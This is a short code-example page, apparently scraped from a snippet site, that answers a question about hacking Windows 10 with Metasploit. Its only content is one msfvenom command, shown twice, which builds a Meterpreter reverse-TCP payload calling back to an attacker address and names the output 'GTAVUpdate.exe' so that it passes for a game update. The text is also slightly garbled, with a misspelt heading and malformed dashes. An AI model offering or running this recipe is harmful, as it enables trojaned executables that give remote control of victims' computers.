which is the best exploit in metasploit to hack into windows 10 code example
Example 1: windows mtesploit kali linux
msfvenom -p windows/meterpreter/reverse_tcp -a x86 ––platform windows -f exe LHOST=192.168.195.72 LPORT=4444 -o /root/Desktop/GTAVUpdate.exe
Example 2: windows mtesploit kali linux
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.195.72 LPORT=4444 -o /root/Desktop/GTAVUpdate.exe